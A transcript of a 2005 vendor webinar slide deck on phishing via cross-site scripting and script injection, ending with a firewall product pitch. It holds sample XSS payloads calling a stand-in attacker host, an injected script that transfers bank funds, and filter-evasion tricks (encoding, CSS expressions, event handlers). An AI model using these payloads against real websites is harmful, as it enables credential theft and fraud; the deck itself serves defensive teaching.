Phishing: When Attacks Get Embedded in Legitimate Websites
-
Upload
alexa-brooks -
Category
Documents
-
view
37 -
download
0
description
Transcript of Phishing: When Attacks Get Embedded in Legitimate Websites
![Page 1: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/1.jpg)
Phishing: When Attacks Get Embedded in Legitimate Websites
Phishing: When Attacks Get Embedded in Legitimate Websites
Live Webinar
May 26, 2005
![Page 2: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/2.jpg)
Imperva Confidential 2
A Word from our Sponsor
ImpervaA Word from our Sponsor
Imperva
Mission Secure the Data Center
ProductSecureSphere Dynamic Profiling Firewall
–Protects proprietary information, custom business applications, and critical servers
–Addresses phishing, identity theft, data theft, malicious robots, worms, denial of service, and SQL injection
–Stops web attacks, database breach, and worm infection
Mission Secure the Data Center
ProductSecureSphere Dynamic Profiling Firewall
–Protects proprietary information, custom business applications, and critical servers
–Addresses phishing, identity theft, data theft, malicious robots, worms, denial of service, and SQL injection
–Stops web attacks, database breach, and worm infection
Internal Users
SecureSphere Gateways
SecureSphere Management Server
Proprietary Information Custom Business Applications and Critical Servers
Data Center
![Page 3: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/3.jpg)
Imperva Confidential 3
Today’s Presenter
Amichai Shulman - CTO of ImpervaToday’s Presenter
Amichai Shulman - CTO of Imperva
Amichai Shulman
– Lecturer on Info Security for Technion - Israel Institute of Technology
– CTO of Edvice, security consultant to banks and financial services firms
– Leads the Application Defense Center (ADC)
Application Defense Center (ADC)
– Attack and defense techniques presented today are the result of research done at Imperva’s Application Defense Center
ADC Data Center Security Series
– Monthly live webinars on attacks targeting corporate data centers
– “Identity Theft” on 6/23 - register at impervaevents.webex.com
Amichai Shulman
– Lecturer on Info Security for Technion - Israel Institute of Technology
– CTO of Edvice, security consultant to banks and financial services firms
– Leads the Application Defense Center (ADC)
Application Defense Center (ADC)
– Attack and defense techniques presented today are the result of research done at Imperva’s Application Defense Center
ADC Data Center Security Series
– Monthly live webinars on attacks targeting corporate data centers
– “Identity Theft” on 6/23 - register at impervaevents.webex.com
![Page 4: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/4.jpg)
Imperva Confidential 4
Phishing
AgendaPhishing
Agenda
• What is Phishing– Sizing the Threat
– Types of Phishing (demo)
– Commonly Proposed Solutions
• Phishing Techniques– Cross Site Scripting Phishing (demos)
– Script Injection Phishing (demo)
• Phishing Defenses– Traditional Defenses
– Evasion Techniques
– Alternative Solutions
• What is Phishing– Sizing the Threat
– Types of Phishing (demo)
– Commonly Proposed Solutions
• Phishing Techniques– Cross Site Scripting Phishing (demos)
– Script Injection Phishing (demo)
• Phishing Defenses– Traditional Defenses
– Evasion Techniques
– Alternative Solutions
![Page 5: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/5.jpg)
Imperva Confidential 5
Phishing Threat
What is Phishing?Phishing Threat
What is Phishing?
• Phishing = Social Engineering + Technical Subterfuge
• Objective– Steal victim’s credentials
– Commit crimes using stolen credentials
• Delivery Mechanism– Spoofed E-mail (or website or IM or Weblogs)
• Link Sends User to…– Bogus Website Phishing
– Real Website Phishing
• Phishing = Social Engineering + Technical Subterfuge
• Objective– Steal victim’s credentials
– Commit crimes using stolen credentials
• Delivery Mechanism– Spoofed E-mail (or website or IM or Weblogs)
• Link Sends User to…– Bogus Website Phishing
– Real Website Phishing
![Page 6: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/6.jpg)
Imperva Confidential 6
Phishing Threat
How Significant?Phishing Threat
How Significant?
• 64 brands reported hijacked by Phishing in Feb., 05
• Dramatic growth over past 2 years
• Attack Implications– Lost Revenue– Brand Erosion– Regulatory Issues
• GLB
• SoX
• CA 1386
• HIPAA
• 64 brands reported hijacked by Phishing in Feb., 05
• Dramatic growth over past 2 years
• Attack Implications– Lost Revenue– Brand Erosion– Regulatory Issues
• GLB
• SoX
• CA 1386
• HIPAA
Source: antiphishing.org
![Page 7: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/7.jpg)
Bogus Website Phishing AttackBogus Website Phishing Attack
Stealing login and password
![Page 8: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/8.jpg)
Imperva Confidential 8
Bogus Website Phishing
The BaitBogus Website Phishing
The Bait
• Use social engineering (such as email) to get the victim to click on a link with attack
• Use social engineering (such as email) to get the victim to click on a link with attack
![Page 9: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/9.jpg)
Imperva Confidential 9
Bogus Website Phishing
Attack - Easy to Detect Bogus Website Phishing
Attack - Easy to Detect
• Manual Solutions– User education– User looking at URL sees
the website is fraudulent
• Automated Solutions– Industry efforts for strict
server authentication– Ex. client side plug-ins
(TrustBar, NetIBA, etc.)
• Manual Solutions– User education– User looking at URL sees
the website is fraudulent
• Automated Solutions– Industry efforts for strict
server authentication– Ex. client side plug-ins
(TrustBar, NetIBA, etc.)
http://www.attacker.com
![Page 10: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/10.jpg)
Real Website Phishing DemonstrationReal Website Phishing Demonstration
Stealing login and password
T
![Page 11: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/11.jpg)
Proposed Solutions for Phishing ProblemProposed Solutions for Phishing Problem
Are they sufficient?
![Page 12: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/12.jpg)
Imperva Confidential 16
Real Website Phishing Threat
Proposed SolutionsReal Website Phishing Threat
Proposed Solutions
•User awareness–Real Website Phishing has the correct URL and real certificates
•Server authentication–Real Website Phishing attacks will authenticate correctly
•Hardware Tokens–Real Website Phishing attacks are run on victim’s system
•Time sensitive or one-time use passwords–Real Website Phishing can exploit the credentials in real-time
•User awareness–Real Website Phishing has the correct URL and real certificates
•Server authentication–Real Website Phishing attacks will authenticate correctly
•Hardware Tokens–Real Website Phishing attacks are run on victim’s system
•Time sensitive or one-time use passwords–Real Website Phishing can exploit the credentials in real-time
![Page 13: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/13.jpg)
Real WebsitePhishing TechniquesReal WebsitePhishing Techniques
![Page 14: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/14.jpg)
Imperva Confidential 18
Real Website Phishing Threat
Phishing Techniques Real Website Phishing Threat
Phishing Techniques
• Cross Site Scripting
– User interacts with real website
– The malicious code is stored at the
attacker’s site or in the link itself
• Script Injection
– User interacts with real website
– The malicious code is stored inside the
real website’s application database
• Cross Site Scripting
– User interacts with real website
– The malicious code is stored at the
attacker’s site or in the link itself
• Script Injection
– User interacts with real website
– The malicious code is stored inside the
real website’s application database
![Page 15: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/15.jpg)
Technique #1Cross Site Scripting (XSS)Technique #1Cross Site Scripting (XSS)
![Page 16: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/16.jpg)
Imperva Confidential 20
Cross Site Scripting
How is it Done?Cross Site Scripting
How is it Done?
• Attack code written in standard client side script language
–E.g. JavaScript, VBScript, etc
• Link in e-mail mixes calls to real website with attack code
–Attack code could be invoked from attackers website
• http://www.superveda.com/login.asp?
return=javascript.src=http://www.attacker.com/logincapture.jscript
–Attack could be completely incorporated into the link
• http://www.superveda.com/dosearch.asp?
return=<script> ATTACK </script>
• Returned webpage mixes both real website and attack
• Attack code written in standard client side script language
–E.g. JavaScript, VBScript, etc
• Link in e-mail mixes calls to real website with attack code
–Attack code could be invoked from attackers website
• http://www.superveda.com/login.asp?
return=javascript.src=http://www.attacker.com/logincapture.jscript
–Attack could be completely incorporated into the link
• http://www.superveda.com/dosearch.asp?
return=<script> ATTACK </script>
• Returned webpage mixes both real website and attack
![Page 17: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/17.jpg)
Cross Site Scripting (XSS) Phishing DemonstrationCross Site Scripting (XSS) Phishing Demonstration
Stealing cookie credentials
T
![Page 18: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/18.jpg)
Technique #2Script InjectionTechnique #2Script Injection
![Page 19: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/19.jpg)
Imperva Confidential 29
Script Injection
How is it Done?Script Injection
How is it Done?
• A close relative of Cross Site Scripting (XSS)
• Difference is location of attack code
– XSS - attacker’s website or in the malicious link
– Script Injection - real web application’s database
• Location makes all the difference
– No action required by user
• Attack runs when victim loads the web page
– Link can be totally benign
• Attack not in the link, the attack is in the site
– Potentially liability for website owner since the attack is inside the website
• A close relative of Cross Site Scripting (XSS)
• Difference is location of attack code
– XSS - attacker’s website or in the malicious link
– Script Injection - real web application’s database
• Location makes all the difference
– No action required by user
• Attack runs when victim loads the web page
– Link can be totally benign
• Attack not in the link, the attack is in the site
– Potentially liability for website owner since the attack is inside the website
![Page 20: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/20.jpg)
Script Injection Phishing DemonstrationScript Injection Phishing Demonstration
Attack embedded in real website database
T
![Page 21: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/21.jpg)
Imperva Confidential 37
Real Website Phishing Threat
Attacks Can Be Anything…Real Website Phishing Threat
Attacks Can Be Anything…• Steal user login credentials
• Steal cookies credentials
• Force victim to execute an action– Any action the victim is allowed to do on the website
– Script injected in banking site to transfer funds:f = document.forms[‘transfer_money’]f.to_account.value = ‘Attackers Account’f.amount.value = 1000000;f.submit()
• Steal user login credentials
• Steal cookies credentials
• Force victim to execute an action– Any action the victim is allowed to do on the website
– Script injected in banking site to transfer funds:f = document.forms[‘transfer_money’]f.to_account.value = ‘Attackers Account’f.amount.value = 1000000;f.submit()
![Page 22: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/22.jpg)
Cross Site Scripting Phishing Demonstration (2)Cross Site Scripting Phishing Demonstration (2)
Victim unknowingly makes an purchase
T
![Page 23: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/23.jpg)
Traditional DefensesTraditional Defenses
![Page 24: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/24.jpg)
Imperva Confidential 44
Traditional Defenses
Identifying AttacksTraditional Defenses
Identifying Attacks
• Attack contain <script>, javascript, or vbscript tags
• Widely known attack vectors– <script>alert()</script>
– <script src=“http://attacker/script.js”></script>
– <img src=“javascript: alert()”>
– <img src=“vbscript: alert()”>
• Other HTML attributes may contain active code– <body background="javascript: alert()">
– <bgsound src="javascript: alert()">
– <iframe src="javascript: alert()”></iframe>
• Attack contain <script>, javascript, or vbscript tags
• Widely known attack vectors– <script>alert()</script>
– <script src=“http://attacker/script.js”></script>
– <img src=“javascript: alert()”>
– <img src=“vbscript: alert()”>
• Other HTML attributes may contain active code– <body background="javascript: alert()">
– <bgsound src="javascript: alert()">
– <iframe src="javascript: alert()”></iframe>
![Page 25: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/25.jpg)
Imperva Confidential 45
Traditional Defenses
Are Signatures Enough?Traditional Defenses
Are Signatures Enough?
• Solution?– Signature based mechanism – Block all requests with specified text string
• “<script>”, “javascript:” or “vbscript:”
• NO!– Numerous ways to evade signature engines– Evasions exploit richness and lax parsing of HTML language
• Solution?– Signature based mechanism – Block all requests with specified text string
• “<script>”, “javascript:” or “vbscript:”
• NO!– Numerous ways to evade signature engines– Evasions exploit richness and lax parsing of HTML language
![Page 26: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/26.jpg)
Signature Evasion TechniquesSignature Evasion Techniques• Whitespaces• Numerical Character Encoding• CSS (Cascade Style Sheets)• Event Handlers
T
![Page 27: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/27.jpg)
Imperva Confidential 47
Evasion Techniques
WhitespacesEvasion Techniques
Whitespaces
• When between tokens or inside HTML strings, HTML parsers usually ignore line feeds, carriage returns, horizontal tabs and null characters
• Instead of “javascript:” we can writeJavascrip t:
• When between tokens or inside HTML strings, HTML parsers usually ignore line feeds, carriage returns, horizontal tabs and null characters
• Instead of “javascript:” we can writeJavascrip t:
![Page 28: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/28.jpg)
Imperva Confidential 48
Evasion Techniques
Numerical Character EncodingEvasion Techniques
Numerical Character Encoding
• Encode characters inside HTML strings as numerical values
• Only the word string in
<tag attribute=“string”>
can be numerically encoded
• Enables attack to evade detection of the “javascript:” pattern string by encoding one or more of its characters
• 25 different ways to encode ‘j’:‘j’ = j = j = … = j
= j = j = … = j =
= j = j ...
• The semicolons are many times not required, so we get an even greater variety of encodings
• Encode characters inside HTML strings as numerical values
• Only the word string in
<tag attribute=“string”>
can be numerically encoded
• Enables attack to evade detection of the “javascript:” pattern string by encoding one or more of its characters
• 25 different ways to encode ‘j’:‘j’ = j = j = … = j
= j = j = … = j =
= j = j ...
• The semicolons are many times not required, so we get an even greater variety of encodings
![Page 29: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/29.jpg)
Imperva Confidential 49
Evasion Techniques CSS (Style Sheets)Evasion Techniques CSS (Style Sheets)• Style attributes can also be dynamically computed using
JavaScript code:– <div style="width: expression(alert(‘Imperva’))">
• Style sheets need not be embedded in HTML code; it can be imported from another file, even on a different host (e.g, the attacker’s) using the <link> tag
• In http://attacker/attack.css:p {
background-image: expression(alert(“Imperva"));
}
• In the attack vector:<link rel="stylesheet" href=“http://attacker/attack.css">
<p></p>
• Style attributes can also be dynamically computed using JavaScript code:– <div style="width: expression(alert(‘Imperva’))">
• Style sheets need not be embedded in HTML code; it can be imported from another file, even on a different host (e.g, the attacker’s) using the <link> tag
• In http://attacker/attack.css:p {
background-image: expression(alert(“Imperva"));
}
• In the attack vector:<link rel="stylesheet" href=“http://attacker/attack.css">
<p></p>
![Page 30: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/30.jpg)
Imperva Confidential 50
Evasion Techniques Event HandlersEvasion Techniques Event Handlers
• HTML event handlers are implicitly assumed to be in JavaScript, and therefore do not require the “javascript:” directive:– <body onLoad="alert(c)">– <img src="http://wherever/doesnt_exist.jpg"
onError="alert()">– <marquee onStart="alert()"></marquee>
• More:– <div style='position: absolute; left: 0px; top: 0px;
height=1000px; width=1000px' onMouseOver="alert()"></div>
– <table onMouseOver="alert()" height=1000 width=1000>
• Many more event handlers (up to 80!) can be utilized
• HTML event handlers are implicitly assumed to be in JavaScript, and therefore do not require the “javascript:” directive:– <body onLoad="alert(c)">– <img src="http://wherever/doesnt_exist.jpg"
onError="alert()">– <marquee onStart="alert()"></marquee>
• More:– <div style='position: absolute; left: 0px; top: 0px;
height=1000px; width=1000px' onMouseOver="alert()"></div>
– <table onMouseOver="alert()" height=1000 width=1000>
• Many more event handlers (up to 80!) can be utilized
![Page 31: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/31.jpg)
Evaluating Alternative DefensesEvaluating Alternative Defenses
• Traditional Defenses• Application Aware Defenses
![Page 32: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/32.jpg)
Imperva Confidential 52
Evaluating Alternative Defenses
Traditional DefenseEvaluating Alternative Defenses
Traditional Defense
• Apply very large set of signatures to ALL traffic• onLoad, onMouseOver, onFocus, …
• <script>, <link>, <img>, style=, …
• Many more we haven’t covered here
• Problems– Easy to evade with client-side encoding features
• e.g. whitespace, numerical encoding, etc
– Multiple signatures have performance penalty
– Multiple signatures results in false positives
– Can not block everything that remotely resembles HTML (i.e. that have <angular> brackets or an equal sign)
• In some places users are allowed to type in HTML code
• Apply very large set of signatures to ALL traffic• onLoad, onMouseOver, onFocus, …
• <script>, <link>, <img>, style=, …
• Many more we haven’t covered here
• Problems– Easy to evade with client-side encoding features
• e.g. whitespace, numerical encoding, etc
– Multiple signatures have performance penalty
– Multiple signatures results in false positives
– Can not block everything that remotely resembles HTML (i.e. that have <angular> brackets or an equal sign)
• In some places users are allowed to type in HTML code
![Page 33: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/33.jpg)
Imperva Confidential 53
Evaluating Alternative Defenses
Application Aware DefenseEvaluating Alternative Defenses
Application Aware Defense
• Focus the search – Only inspect relevant fields
• identify dynamic pages, parse HTTP correctly
– Don’t bother with fields that normally accept scripts • e.g. forms that allows editing of HTML text
– Detect attacks only if field contains suspicious characters• < > = & # etc.
• Cover all cases– Normalize input using client-side decoding
• Remove redundant white space and decode numerical HTML and style sheet encodings
– Apply client side decoding only if required – Create a comprehensive set of signatures
Minimize performance penalty & maximize accuracy
• Focus the search – Only inspect relevant fields
• identify dynamic pages, parse HTTP correctly
– Don’t bother with fields that normally accept scripts • e.g. forms that allows editing of HTML text
– Detect attacks only if field contains suspicious characters• < > = & # etc.
• Cover all cases– Normalize input using client-side decoding
• Remove redundant white space and decode numerical HTML and style sheet encodings
– Apply client side decoding only if required – Create a comprehensive set of signatures
Minimize performance penalty & maximize accuracy
![Page 34: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/34.jpg)
A Practical Approach to Real Website PhishingA Practical Approach to Real Website Phishing
![Page 35: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/35.jpg)
Imperva Confidential 55
SecureSphere Dynamic Profiling Firewall
Application Aware DefenseSecureSphere Dynamic Profiling Firewall
Application Aware Defense
• ADC Signatures– Comprehensive set of signatures
• Dynamic Profiling– Identifies the relevant fields
for signature checking– Automatically models the
structure and dynamics of..• Web Application: URLs, cookies,
users, parameters, sessions, etc.• Database: SQL queries,
tables, parameters, users, etc.
• Automatically updated– ADC Signatures updated on regular basis– Dynamic Profiling automatically adapts to app/db changes
• ADC Signatures– Comprehensive set of signatures
• Dynamic Profiling– Identifies the relevant fields
for signature checking– Automatically models the
structure and dynamics of..• Web Application: URLs, cookies,
users, parameters, sessions, etc.• Database: SQL queries,
tables, parameters, users, etc.
• Automatically updated– ADC Signatures updated on regular basis– Dynamic Profiling automatically adapts to app/db changes
Internal Users
SecureSphere Gateways
SecureSphere Management
Server
Data Centers
![Page 36: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/36.jpg)
Q & AQ & A
![Page 37: Phishing: When Attacks Get Embedded in Legitimate Websites](https://reader035.fdocuments.in/reader035/viewer/2022062304/5681351b550346895d9c739a/html5/thumbnails/37.jpg)
Imperva Confidential 57
Thank YouThank You
Imperva, Inc.
950 Tower Lane, Suite 1710Foster City, CA 94404 Sales: (866) 926-4678
www.imperva.com